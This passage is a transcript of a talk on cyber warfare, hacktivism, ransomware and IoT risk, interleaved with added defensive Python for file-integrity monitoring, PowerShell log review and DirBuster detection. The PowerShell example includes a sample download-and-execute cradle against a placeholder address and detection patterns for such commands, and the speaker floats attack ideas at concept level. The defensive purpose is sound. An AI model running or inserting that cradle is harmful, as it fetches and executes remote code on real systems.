
how to destroy parts of the electrical grid, water systems, airlines. We were doing things like trying to figure out how to bankrupt an airline; we were trying to figure out how to destroy generators. One of the projects I got to work on for a while was on centrifuges. So... there you go. I don't mind; it does say that, but that's not true. If you've read the paper, I actually wrote that attack out in a paper and published it, and Stuxnet followed the same attack. So, critical infrastructure anywhere: this is a huge problem around the world.
Back in the early '90s I was working at the Pentagon, and one of my friends I once worked with coined the phrase "digital Pearl Harbor". That was a long time ago, and it carried on; the last one to say it was Leon Panetta, the former director of the CIA, and it became a thing. We still haven't had a digital Pearl Harbor. Attacking the critical infrastructure isn't easy. I mean, Stuxnet took multiple years to write and get correct, and it still had some flaws, and that's how it got found, because of a flaw. The issue is, all of our important infrastructure is not the same, so if you try to attack the electrical grid somewhere you may cause a little blip,
and it's less brittle. But if you had the time and effort to do it, you could identify key nodes in an electrical grid or water systems and cause a major problem, so you have to do a lot of research. Pretty much everything out there today is connected, and it's a major thing. Shipping cranes, right here: I did a project on shipping cranes, and one of the things with these shipping cranes is they normally come from South Korea, and it normally takes five years or better to get these cranes built and shipped. These things are all computerized, and you can actually cause them to wreck into the side of a ship
if you do the right attack; you can cause the swing to [ __ ] and cause damage on the ship and create problems.

Automation. We know about automation, the Internet of Things. Anyone ever used X10 back in the day? X10 people. So X10: when I had my house in Charlotte I had X10 in there, and this is before the Internet of Things concept. With X10 you could, you know, set up your bed and turn the lights on and turn the lights off and everything else. Well, one of the projects I did at my house was to take one of those off, put it in an isolated area, and try to make it cycle faster. And you know what happened: it cycled too fast, and the mechanical relay [unintelligible]. So this is the big thing: back then people didn't think about that, but now we've got these innovative things. Like when I was in Charlotte, I mean, my thermostats were connected, my TV, I had private television channels in my house, I had 66 percent of my utilities connected to the Internet, so I had a smart meter outside, a smart water heater, and so everything was potentially attackable. And one of my friends, with the Internet of Things, he had this high-tech bread machine one time, you know, that was connected to the Internet, and he couldn't program it, and I was able to just walk up to his Internet of Things device and hit, by design, you know, the wrong sequence, and crash it and break it, break this bread machine. So each year there are going to be so many things that are in here. You know, like a washing machine: you go down to Lowe's and you'll find you can buy a washing machine that will send me a message when my clothes are done. I mean, I don't care if my clothes are done, I don't want to listen for it, but you know, do I need to worry about milk or something like that? So you start deploying things in your own house, you have to worry about it. I mean, I had a meal down here at a restaurant in Asheville the other day, and I pulled out my phone and it said, would you like to connect to the thermostat? And then the password thing: what is the default password for this product? Imagine sitting in a restaurant and turning up the air.

But there are other things with the Internet of Things that you may not have thought about. Privacy is a big problem there, and the things it then collects, you know, personally identifiable information. And you can use that; I did a great project one time called patterns of life, and so if you take that data that's coming off your Internet of Things, you can actually build a pattern of life of a person. And so if Big Brother is collecting this data, they know when you wash clothes, when you turn your lights on, when you walk by your thermostat; when you walk by a Nest thermostat it will come on, so Nest, you know, Google, knows when you walk by the thermostat, if you're home, right? They can pick that up any time you're doing some of these things in your home with these Internet things. When you turn on your Hue lights, Philips knows that you used that Hue device, especially because you're using their app.

The future is already here. We are in the... Charlie, this is actually from a presentation I gave in Berlin five or six years ago about the future: it was going to have cars, and you know, oh, Charlie, one of the guys recently did something for Jeep and hacked the Jeep; you've read about this a couple of times. But the thing is, when you start looking at some of these cars today, well, Charlie actually had to have physical access to the car to modify it; he couldn't do it remotely. But in the future it's going to be possible to do some of these attacks remotely. I mean, DARPA and some other people and DHS are looking to improve the cybersecurity of cars, but one of those things that I haven't seen happen, which I would love to see happen, is electric cars: when you go to the electric charging station and you plug your car in. I mean, how many of you have thought about, you know, putting malware inside the charging station? Because that's a computer that's connected to that car, and that power network monitors it. I would like to be able to hack into that station, put that stuff into the car, and then there's going to be some malware in the car, right? Or how many of you have thought, when you go into Hertz to rent a car, to take a USB and plug it into the car to upload some songs in there, but with some malware on it, and the next time the technician comes in to plug in, his USB drive gets infected and goes into the fleet, and then have something like a Charlie-type thing shut the car down on a certain day? Imagine how that would impact people. These are the types of attacks that could occur: how many customers, credit, revenues lost.

I've had my credit card... I'm the cyber security guy, and I've had my credit card information stolen at least two dozen times now, and been involved in so many data breaches. This is crazy, and it infuriates me every time I get a notice in the mail that I've been involved in a data breach, because the first thing that comes up is: who failed in his job? What cybersecurity guy, what database administrator, what developer, what QA person, what manager, who failed to do this? The Target breach: when they attacked the POS systems, Target was not using a detection system that would tell them that they had software being installed on their POS systems with administrator rights. They could have had a simple program, not even a commercial program; they could have written their own program and installed it on these systems, and it could have alerted them when that software got put on that system, and they would have known about the attack that quick. That's laziness, that's what that is. You don't have to buy a million-dollar product to fix a simple problem.

Lockout: this is becoming commonplace now. The hospital right here in Asheville, Mission, you know, a couple of months back they had a big attack. This is one of them in California; they had a big attack here trying to get into the hospital. You know, it's a pretty simple attack: someone breaks into your system, they install software, they encrypt your files, and they ransom them for Bitcoin. Once this hospital paid, it became pretty commonplace: hospitals are going to pay. I mean, how do you get around this attack? Having backups ready. Yeah, backups, that's how you get around this. I mean, how would an attacker improve this attack? Damage, corrupt your backups, so it can stay for many months and crush your backups and then do it, and it can make more money.

Now, one of the things I've done a lot over the years is a lot of research on these hacktivist groups and nation-state attacks, and if you look online you'll see a bunch of stuff on cyber warfare and these types of events. So, "delete everything": the first one that you would really know about is Saudi Aramco, right?
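Going back to the Target point above before the talk moves on to Saudi Aramco: the "simple program you could write yourself" that alerts when software lands on a fixed-function box. This is an added example, not the speaker's code and not Target's tooling. It takes a gold-image snapshot of every watched file's SHA-256, stores it off the box, and diffs later snapshots against it; the directory tree, file contents, the watched-suffix list and the dropped unknown_tool.exe are all constructed for the demo.

```python
"""Baseline-and-diff monitor for executables on a fixed-function host.

Added example (not from the talk). A gold-image snapshot of every watched file's
SHA-256 is taken once and stored off-box; later snapshots are diffed against it,
and anything added, changed or removed raises an alert. Directory names, file
contents and the dropped unknown_tool.exe below are constructed for the demo.
"""
import hashlib
import json
import tempfile
from pathlib import Path

# Assumption: on a POS-style box only these file types should ever change.
WATCHED_SUFFIXES = {".exe", ".dll", ".sys", ".ps1", ".bat", ".vbs"}


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: Path) -> dict:
    """Map each watched file (path relative to root, POSIX form) to its SHA-256."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix.lower() in WATCHED_SUFFIXES
    }


def diff_snapshots(baseline: dict, current: dict) -> dict:
    """Return what changed since the baseline: new files, hash changes, deletions."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(k for k in set(baseline) & set(current) if baseline[k] != current[k])
    return {"added": added, "modified": modified, "removed": removed}


def alerts(diff: dict) -> list:
    """One alert line per change; an empty list means nothing landed on the box."""
    return [f"ALERT {kind.upper()}: {rel}"
            for kind in ("added", "modified", "removed")
            for rel in diff[kind]]


def demo() -> dict:
    """Constructed scenario: gold image, then an unknown EXE dropped and a DLL replaced."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "pos.exe").write_bytes(b"MZ sample: original POS binary")
        (root / "bin" / "payments.dll").write_bytes(b"MZ sample: original payments library")
        (root / "README.txt").write_text("not a watched file type")

        # Take the baseline once and keep it somewhere the box cannot rewrite it.
        stored_baseline = json.dumps(snapshot(root))

        # Simulated intrusion: a new tool dropped, an existing library trojaned.
        (root / "bin" / "unknown_tool.exe").write_bytes(b"MZ sample: dropped by attacker")
        (root / "bin" / "payments.dll").write_bytes(b"MZ sample: trojaned payments library")

        diff = diff_snapshots(json.loads(stored_baseline), snapshot(root))
        return {"diff": diff, "alerts": alerts(diff)}


if __name__ == "__main__":
    for line in demo()["alerts"]:
        print(line)
```

Run it on a schedule against the real install root with the baseline kept on a host the POS cannot write to; an empty alert list is the expected steady state, and the first non-empty one is the signal the talk says Target never had.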
Saudi Aramco here used a commercial product that was freely available, that you could download with a 30-day key, and it was from a company in the UK. The developer, whoever it was, downloaded it, tweaked it, tested it, and within only this 30-day period launched it, and it got thirty thousand computers at Saudi Aramco, right? He launched the attack on a major holiday, a major holiday in Ramadan. He launched the attack on that holiday when everyone was off, and everything went. So many people got fired for this incident, right? And the company that sold that commercial software actually made some modifications so you could no longer register with a Gmail; you needed a corporate account to get a key.

Then a little bit to the voice here: this is Sony, allegedly North Korea, and this is allegedly Iran. North Korea here, Sony, that's what they used; they used the same software. But what Trend Micro, Symantec and everyone else did was go out and make sure that that version of the software, at least here, couldn't be used there. But guess what: there were 22 other versions before this that worked, that were freely available, and they worked. So this hacker took a version that wasn't being blacklisted by Symantec or McAfee or Trend and used it here to confuse things. And when I wrote and spoke with my friend who was the chief information security officer at Trend, I said, why didn't you go out and get all the samples of this stuff and block them? And he goes, well, we never thought about that. Why not? You didn't think someone... one person used this one; all the other 22 worked. So what did you block?

But now we've got the problem with ransomware, and now we kind of know that they can use these commercial software products here, but over here they're not using commercial software; they're leveraging stuff on their own systems. I mean, most of us have PowerShell running on our system; we also have batch running on our system, ready, basic Windows commands. So these are like... this one here leverages PowerShell, and this one, they've got a new thing right now: they just delete all your files and tell you to buy them back. They don't exist; they erase them all and just put a message on your computer: hey, buy your files. They're gone, and they send you information, hey, this is how you get your files back, but they're not there. So how many of you have even, you know, built something on your systems to see what PowerShell is being used, right, you know, whether it's administrator or not administrative? Because this stuff doesn't require administrator rights.

The digital voice. Anonymous, originally, and now this was about doing stuff in Australia, and you know, one of the first operations they did: they did a thing where they sent out these pornographic photos of girls with small breasts, right? That was the first thing they did. Now this has actually moved to a whole other realm, and Anonymous itself has been co-opted by so many people, and co-opted means that people put themselves under this umbrella and say they're Anonymous, but they're not Anonymous; they're nation-state actors and other things. You know, this operation here, Operation Independence Ukraine, goes back and forth: are they pro-Ukrainian, are they pro-Russian? It all depends on who they play with. Same with here: this one is anti-Russia, and this was a very good swing; these are all kind of degrading Ukraine. This right here was very interesting: it was a group that took place in Crimea, it was a hacker organization, it came up online pretty quick, it set up a website, it had all of the correct themes and symbols, and it was hacking these sites with pro... it was actually Nazi propaganda. If you've ever followed this, when Russia attacks a country they try to use Nazism to say these people are bad, and they use this over and over at home, right? So they hacked all these websites, there were 200-some websites throughout the country, and posted the propaganda up there. The bad thing is, if you're working incident response, the thread I tell them is: before you fix your computer that's been hacked, please collect intelligence, collect something off of it so people can come back and figure out how it was hacked, you know, potentially the automated script, because it had to be an automated script to hit 200 systems, right? But when you try to collect any information about some of these hacks, no one had it, because when you talk to so many companies, they just, you know, rebuild their systems and didn't collect anything.

So this was a very interesting thing here: this was after Estonia was attacked in 2007. They stood up a NATO center called the CCDCOE, which is kind of a think tank for NATO for cybersecurity, and what happened here is this organization here, which is allegedly pro-Ukrainian but is really Russian, launched a major denial-of-service attack against the CCDCOE in Estonia. Not only that, they also took out NATO's primary website for 24 hours. NATO was offline, NATO's primary website was offline, and they couldn't get it up, because whoever this group was had a lot of bandwidth and was able to knock these guys out. And the CCDCOE got knocked offline and had to move to Cloudflare; I mentioned that it took like nine days to move all their stuff over, which was a standard website. But the thing here that's interesting: you know, you have the bird of prey here and the snake, and it's kind of this opposition, you know, "I'm going to eat you"; that's what the symbology is.

So, hacktivism: how many of you actually followed hacktivism? So we all know about this one here, the Syrian Electronic Army. A couple of years back they had public attacks that were notable,
like when they took the New York Times offline. Their registrar, the way their DNS was being co-opted, and why was it in Australia, why wasn't it somewhere else, why didn't they have better two-factor authentication on it, all these things. It was crazy that it happened, and they took the New York Times offline; I think it was offline for like two days. So here's the thing: the Syrian Electronic Army did that, and some disaster recovery stuff here is, the New York Times could have used IP addresses, you know, and had a secondary site to fall back on with a secondary, you know, domain, and tweeted stuff about, here are our news stories. And no plan; it all fell apart for the New York Times.

AnonGhost is an organization that always attacks Israel, usually in September, and always does these things, OpIsrael. The thing is, if you've done threat intelligence, and I do it occasionally, these two groups are the same group. They registered their websites; if you go back and back there's some data, and you can find one or two data points that actually link these two groups together, a small piece of data that ties the two together. They're the same group right here. Here's another important thing, together groups, and we were doing analysis on this, but this is another half of this group, an alleged hacker from this group. This photo right here is from the Punisher; the scarf he's wearing right there is a red shemagh scarf, which is a symbol of Hamas, and this symbol here actually says "there is no god but God, and Muhammad is the Messenger of God".

Espionage isn't really new; I mean, we've been doing it for a while. I've been banned from the DMV conference because I gave a lecture there on how to footprint and steal information from Lockheed Martin, and I was banned from the conference for life. Well, you know, they should have protected it; it was so good they had... after Lockheed Martin threatened suing, they decided they were going to start a counterintelligence program, so that was a good thing, they started counterintelligence. This person, all the information that was available was free online; I couldn't help with that. I found someone that was taking Joint Strike Fighter documents on their iPod, along with Aretha Franklin's greatest hits, and not stripping the metadata back out before they put it back into the network. So that was a little thing. So there's a lot of stuff about this espionage thing; it's nothing new.

We've got saber-rattling, which is another issue. More curious, North Korea: one of the first attacks was on the Fourth of July many years ago; North Korea knocked out the State Department, and not just that, the CIA; it knocked out several major government agencies with a denial-of-service attack, and most of those government agencies eventually left their service provider. I think they went to Akamai now; I don't know who they were with before they left that service provider and moved over. And this has become a big issue because North Korea is leaning forward on a lot of stuff. "We come in peace."

My claim to fame is the Georgian attack; I did a lot of analysis on that, and I wrote a classified paper on that for this government. So this was the first military operation that we know about where cyber was a preparatory phase. So they launched a cyber attack and took out pieces of the communication architecture that the president and others would use to communicate with their population about Russia coming across the border, and that was the first time. And the attacks lasted: they started hours before the operation took off, and they lasted all the way till they signed a peace accord, and then they stopped, right? The Russian military still has an occupation in South Ossetia, which is on the border; they took control of it. But you know, how do alleged hackers run an operation that starts right before a military operation, and how do those hackers also stop right when the military operation ends with a peace accord? Because it doesn't happen, right? They also had, back to forensics and threat intelligence, we also had a digital image put online, and this is what I'm saying about collecting intelligence: that digital image online they used for propaganda, and so I was able to trace that image back and find the original image in a repository online. That image was... this attack occurred in 2008, and the image was actually created in 2006, in another period of time when Russia and Ukraine were in turmoil. It was already pre-prepared for an operation that never got used. So when you're collecting intelligence, look at everything.

The operation here, the same thing: blackouts, all the military took off their stuff... we have all kinds of similarities between here: a group stood up here, and as fast as this one, a group stood up and started doing cyber attacks like I was just talking about. The interesting thing here: Putin always said that there was no Russian military there, but there's a great video online that I found, it was from France, of the shooting in Crimea, and if you freeze-frame it, all the guys were wearing armbands, so they had some type of, you know, show of leadership. And the key thing: they had a certain weapon that's only issued to Russian Spetsnaz forces, and they were carrying it around the street. So they should not have had that; others don't carry that weapon. That's not where this... so this is a big deal.

Cyber warfare: is it real, or a fantasy? There have been many books written about this; Richard Clarke wrote the first one, and some of my other friends have written books about this. Is it real? Cyber warfare is real. The question is, will we ever have it, what cyber warfare would be. Cyber will always be part of military operations in the future, but it's pretty real. Because, you know, we talked about the USB key, Stuxnet, and it wasn't really a USB key. I mean, it got into Iran's nuclear program, right? It wasn't the USB key; I mean, they had to actually attack and install Stuxnet in computer systems all over Iran at certain key facilities
and that software then is picked up by someone on a USB. It's a program that jumped to USB; it could only move three times, and once it moved three times it deleted itself, so you wouldn't... so the next way it hit... okay, so it started in one place; you've got something in the program to go with. But I mean, also, if you've been paying attention, those key assassinations and all kinds of stuff that went on. Great minds, if you've ever looked at it: they made shaped charges, they made this great shaped charge that stuck on a vehicle and only blew up inside the vehicle, killing the occupant and having no collateral damage outside. Professional.

Cyber terrorism: I've been writing about this for three years now. Cyber terrorism is going to happen eventually; it's going to get to that point. Many years ago I wrote a program, a digital mousetrap program to catch insiders, and I kind of had a problem with it, and I posted it online to get someone to crank on it, and a guy from Syria downloaded it, corrected it, made it much more efficient, and then I traced him back, and he was sitting in this room, and he had flags of, you know, these terrorist organizations on his wall and his buddies sitting around. I'm thinking that's going to be the future. Eventually those guys will become attackers and figure this out. If someone wanted to, we could co-opt and have terrorism start cyber terrorism; it would be very easy to do. The only thing you would have to do to get to this point is create an application that would be a denial-of-service application or something else, and put it out there for people to use the application worldwide. There are millions of people that would donate their computers for this, and it would be impossible to stop. It hasn't made it that far, because cyber terrorism doesn't sell like a suicide bomber or a guy with an AK walking around; it doesn't sell. But the world is screwed, great.

I mean, I've been in this business so many years, and I constantly see that we have problems. You know, when I used to be a pen tester, I'd go in and we'd break into a place, and I would have the CIO say, you shouldn't have been able to break in, because I spent a million dollars on a product and you shouldn't have been able to get in. And I'd say, well, why didn't you teach your developers to write better code? Why don't you have a better QA process? Why didn't you have this? And they'd just look at me, like, those are the things you should spend your money on. And this is what I've learned over the years, where the problem is: you know, we are the problem. It's not... I mean, we sometimes, and I know guys that do this, I mean, I asked some developers to write some code; I told them, you know, parameterize SQL statements, we need to make sure we remove certain hidden files and all this stuff, and the developers didn't listen, and then Sony got attacked, and it's like, you know, why didn't you take the time to do this? And they said it costs time. What, an extra 10, 15, 20 minutes is going to cost? You want to get it out... 10 or 15 minutes leads to a data breach, right? So we're the problem; we have to figure out how to fix ourselves.

And a lot of times when I go to corporations, when I was doing pen tests and security assessments, I always find the processes in that corporation are bad: they don't have solid processes in development and other things, networking architecture; they don't have solid processes. Now, networking, [unintelligible], manage by bringing those things in, and some of those things are free, really. To build a process takes time, but once you get it built it's kind of free, everything that you roll. So the thing here, you know, how do we improve ourselves? And this is one thing here. You cannot see these words, all right? The light's still pink, yeah. So
here's the thing here: I want to do this from my attacker viewpoint, and it says "instruments of battle are valuable only if you know how to use them". That's true. You have to know how to use the instruments the hackers are using, and I hate to use the word "hackers"; they're really criminals. They're using them against you. It's not really hackers, it's criminal elements, cyber criminals from Russia and Ukraine or Estonia, China or someplace else, that are using this, and all these tools they're using are normally freely available online. Someone described it: go to GitHub and take code, put the parts together, and learn to enhance it. So you need to take tools, you know; if you go out and download DirBuster, right, to see what kind of directories are in your system, you need to do that and learn that, because that's what the attacker does, that's how the attacks come, and we don't run DirBuster. But from the defender's point of view, the defense, once we run DirBuster, and use that as an example, we have to figure out the directories they're trying to get to. Do we need to remove directories? Do we need to harden our stuff? If you see someone running DirBuster, do we need to, you know, take their connections and put them in a tar pit? What do we need to do? Do we need to have an intrusion detection system, something to throw it off? We have to have things written for this stuff.

And I think it's... when I was in the Special Ops branch and the intelligence branch, one thing I used to teach people is you really have to think differently. I hate the phrase "think outside the box", right? I hate it. You don't mind it; it's too limited. That is not what we need to do. If you only think outside the box, you need to get another job, really, you need to get another job. Really, what you have to do is, you have to think outside the box, you have to think inside the box, you have to become the box, and you have to assume there's no box at all. You have to think about the problem from every angle there is, and if you cannot think that way, you need to get another job.

If I get questions... [Audience question, partly inaudible, about misconceptions] I think the media created some of the problems, yeah, because, I mean, like Daniel: Daniel was trying to get something done with the Citizen-Times, and they wanted a negative spin versus a positive spin. So because... the reporter told Daniel, you know, "if it bleeds, it leads", and that's really what it is. When you have an attack like that, if it's like that, you know, it draws attention, right? It's something like this, I mean, for example, here: I was trying to rent an apartment here in Asheville on Craigslist, and you know the scams from Craigslist, there are tons, and I approached the newspaper, the Mountain Xpress, and WLOS, and said I wanted to talk, you know, this is a major problem, you should alert people about the possibility of scams, and they said, we don't care about that. I'm like, we maybe don't care about it? So the issue is they pick the stories that are the best for them, that get the most attention, and some stories they don't go with.

Any other questions? [Audience question, partly inaudible, about whether this activity is starting to go away] I mean, it's like people said that when Stuxnet was found, probably all operations stopped. I doubt it, and China has just figured out another way to do it, right? I mean, FireEye may catch something, just like CrowdStrike may catch something and others may catch other things; no one's going to catch everything. And once you start catching one or two of these things and you start talking about it, the Chinese are smart enough to write new code that gets around anything FireEye... I don't think they're all... they've bought CrowdStrike services and, you know, the other services out there, and run it against them. I mean, it's what most cyber criminals do: buy every antivirus piece of software to run against, to see what is spotted, before they sell their wares out there. They've done this, their due diligence. So China's changed their parameters and is looking at different things right now. I would say that there are still more of the same type of attacks, so you'd say that there are, as before.

[Audience question, partly inaudible: one of the problems in organizations is processes; what are the biggest contributors to that problem in organizations?] Management, management, management. A lot of it is thinking... people just don't want to admit the fact that security's hard, and they're always looking for some magic application to take care of everything. I think security is hard, but I don't think it's impossible, yeah, you know, and I think that's where we have a disconnect sometimes. So they build some management thing, "it's impossible", plus a lot of vendors come in, and I'm a vendor, I have a vendor company that sells vulnerability intelligence to people, but you know, just buying my vulnerability intelligence will make you more... it'll be more security, but you still have to do the work on your side to fix the problem. So, but concerning processes, how many of you use like an ISO standard? Yeah, ISO standard.
So my other company is called the U.S. Cyber Consequences Unit, and back in 2007 we released the Cyber Security Checklist, and it went on to become an international security standard. It's free, it's on the website, and Symantec and some other companies put it in their compliance tools. It's a free checklist; including at RSA this year, my business partner released the checklist, and that checklist is totally updated, and that checklist is free; it was funded by some organizations for the research on it. But that checklist, if you haven't looked at it, it's 176 pages long, right? It sounds a little long, but the checklist is written from two areas: one is from the attacker perspective, you're an attacker; the other one is from the defender. So when you go through this it goes through the whole lifecycle of security and supply chains and software development, networking. So I would recommend going out and looking at it and telling me how you like it; it could help you with your businesses. A lot of people who used it have commented it's pretty good.

So, any other questions? [Audience question, partly inaudible, about organizations that are doing a good job] I'll tell you, I don't know of an organization that is doing it perfectly; that's the issue. CrowdStrike has their own way to talk, FireEye has their own way to talk, iSIGHT Partners has their own way to talk, ThreatStream: they just download everything free from the Internet and repackage it and sell it. I don't think anyone is doing it right. In order to do some of this research it requires a lot of data, it requires a lot of effort to do it right, and a lot of brainpower, it really does. I mean, just to analyze, like, you know, a small piece of a thing, to try to link the Syrian Electronic Army with AnonGhost, or trying to link this group over here with Hamas just based on the symbology. When I worked in intelligence, I also worked in deception operations and psychological operations, so I learned how to look at things and symbols and stuff like that, so I take those pieces and gather them. It's not easy to link all this data together; I mean, to find a piece of metadata that ties something together, to find the log file that ties something together, it's not easy. And these groups like CrowdStrike, FireEye, iSIGHT Partners, they're in competition; they don't share their stuff. I mean, Daniel and I, when I was going through the stuff on the apartment scams here, I was trying to work with Daniel, who works in a bank, trying to work with him to go through the financial services sector and report a cyber crime. You know, I eventually social-engineered three bank accounts from this criminal, telling him I couldn't use the bank account, I couldn't do this; he kept giving me new bank accounts over and over and over, and we tried to report him to Bank of America and SunTrust. That was an impossible task, to report stolen bank accounts at the bank that were being used for cybercrime; it was just impossible. So, any other questions? Daniel, say... [Applause]
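On the point made in the talk about building something to see what PowerShell is being used on your systems, administrator or not: an added example, not the speaker's code. It takes constructed records shaped like the fields a SIEM carries for Windows Security 4688 (process creation with command line) and PowerShell/Operational 4104 (script block logging), decodes an -EncodedCommand argument (base64 of UTF-16LE), keeps an inventory of every account that ran PowerShell at all, and separately lists the invocations that carry indicators. The indicator patterns, the account names and the 203.0.113.5 URL are my assumptions and sample values, not anything from the talk.

```python
"""Review of PowerShell use from Windows event data, admin and non-admin alike.

Added example (not from the talk). Records are constructed to look like the
fields a SIEM would carry for Security 4688 (process creation with command line)
and PowerShell/Operational 4104 (script block logging); the user names and the
203.0.113.5 URL are sample values. Indicator patterns are my own choices.
"""
import base64
import re

# Assumed indicators; extend from your own incidents.
INDICATORS = [
    ("download_cradle", re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("inline_base64", re.compile(r"FromBase64String", re.I)),
    ("hidden_or_bypass", re.compile(
        r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b|-e(?:p|xecutionpolicy)\s+bypass", re.I)),
]
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """Return the plaintext behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_powershell(event: dict) -> bool:
    return event.get("event_id") == 4104 or "powershell" in event.get("process", "").lower()


def review(events: list) -> dict:
    """Inventory every PowerShell use by account, and list the ones carrying indicators."""
    inventory, findings = {}, []
    for ev in events:
        if not is_powershell(ev):
            continue
        inventory[ev["user"]] = inventory.get(ev["user"], 0) + 1
        text = ev.get("cmdline", "") + "\n" + ev.get("script_block", "")
        decoded = decode_encoded_command(ev.get("cmdline", ""))
        if decoded:
            text += "\n" + decoded  # match on what actually ran, not the base64 blob
        hits = sorted(name for name, rx in INDICATORS if rx.search(text))
        if hits:
            findings.append({"user": ev["user"], "elevated": ev.get("elevated", False),
                             "event_id": ev["event_id"], "indicators": hits,
                             "decoded": decoded})
    return {"inventory": inventory, "findings": findings}


# Constructed sample: one afternoon of events from a workstation and a POS host.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"event_id": 4688, "user": "CORP\\jdoe", "elevated": False, "process": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + SAMPLE_ENCODED},
    {"event_id": 4104, "user": "CORP\\svc_backup", "elevated": True, "process": "powershell.exe",
     "script_block": "Get-ChildItem C:\\Backups | Compress-Archive -DestinationPath D:\\nightly.zip"},
    {"event_id": 4104, "user": "CORP\\pos01$", "elevated": False, "process": "powershell.exe",
     "script_block": "$b=[Convert]::FromBase64String($x);"
                     "[IO.File]::WriteAllBytes('C:\\Users\\Public\\u.exe',$b)"},
    {"event_id": 4688, "user": "CORP\\admin", "elevated": True, "process": "cmd.exe",
     "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    result = review(SAMPLE_EVENTS)
    print("PowerShell use by account:", result["inventory"])
    for finding in result["findings"]:
        print(finding)
```

The inventory is the part the talk is asking for: the backup service account's benign archive job shows up there too, because the question is who runs PowerShell at all, and a non-elevated user or a POS machine account appearing in it is worth a look even before any indicator fires.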
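On the DirBuster point in the talk (figure out which directories they are trying to get to, then decide whether to harden, remove, or tar pit): an added example, not the speaker's code. It parses constructed combined-format access log lines, profiles each source address by 404 count, 404 ratio and request rate, checks the user-agent for the tool's default string as a weak signal (it is trivially changed, so the 404 burst is the one that survives), and returns a verdict plus the probed paths for the hardening review. The thresholds and the addresses (documentation ranges 198.51.100.0/24, 203.0.113.0/24, 192.0.2.0/24) are my assumptions.

```python
"""Spotting a DirBuster-style directory brute force in web access logs.

Added example (not from the talk). The log lines below are constructed in
combined log format; the source addresses come from the documentation ranges.
Thresholds are assumptions, and the 'DirBuster' user-agent check is a weak
signal since the agent string is trivially changed; the 404 burst is the signal
that survives that.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Assumed thresholds; tune to your own traffic before acting on the verdicts.
MIN_404S = 5         # at least this many 404s from one client ...
MIN_404_RATIO = 0.8  # ... making up most of what it asked for ...
MIN_RATE = 2.0       # ... at two or more requests per second => tar pit.


def parse_line(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def profile_clients(lines) -> dict:
    """Per source IP: request counts, 404 burst metrics, UA hit, verdict and probed paths."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    report = {}
    for ip, recs in by_ip.items():
        times = [r["ts"] for r in recs]
        span = max(1.0, (max(times) - min(times)).total_seconds())
        missing = [r["path"] for r in recs if r["status"] == 404]
        ratio = len(missing) / len(recs)
        rate = len(recs) / span
        ua_hit = any("dirbuster" in r["ua"].lower() for r in recs)
        burst = len(missing) >= MIN_404S and ratio >= MIN_404_RATIO
        if ua_hit or (burst and rate >= MIN_RATE):
            verdict = "tarpit"
        elif burst:
            verdict = "watch"   # slow and low: not worth a tar pit yet, but log it
        else:
            verdict = "ok"
        report[ip] = {
            "requests": len(recs),
            "not_found": len(missing),
            "rate_per_s": round(rate, 2),
            "ua_dirbuster": ua_hit,
            "verdict": verdict,
            # the directories they were trying to get to, for the hardening review
            "probed": sorted(set(missing)),
        }
    return report


DIRBUSTER_UA = "DirBuster-1.0-RC1 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/44.0"
SAMPLE_LOG = [
    # stock DirBuster: default user-agent, fast, everything 404
    f'198.51.100.23 - - [12/Mar/2016:10:15:01 +0000] "GET /admin/ HTTP/1.1" 404 162 "-" "{DIRBUSTER_UA}"',
    f'198.51.100.23 - - [12/Mar/2016:10:15:01 +0000] "GET /backup/ HTTP/1.1" 404 162 "-" "{DIRBUSTER_UA}"',
    f'198.51.100.23 - - [12/Mar/2016:10:15:02 +0000] "GET /old/ HTTP/1.1" 404 162 "-" "{DIRBUSTER_UA}"',
    f'198.51.100.23 - - [12/Mar/2016:10:15:02 +0000] "GET /test/ HTTP/1.1" 404 162 "-" "{DIRBUSTER_UA}"',
    f'198.51.100.23 - - [12/Mar/2016:10:15:02 +0000] "GET /config/ HTTP/1.1" 404 162 "-" "{DIRBUSTER_UA}"',
    f'198.51.100.23 - - [12/Mar/2016:10:15:03 +0000] "GET /.git/ HTTP/1.1" 404 162 "-" "{DIRBUSTER_UA}"',
    f'198.51.100.23 - - [12/Mar/2016:10:15:03 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 162 "-" "{DIRBUSTER_UA}"',
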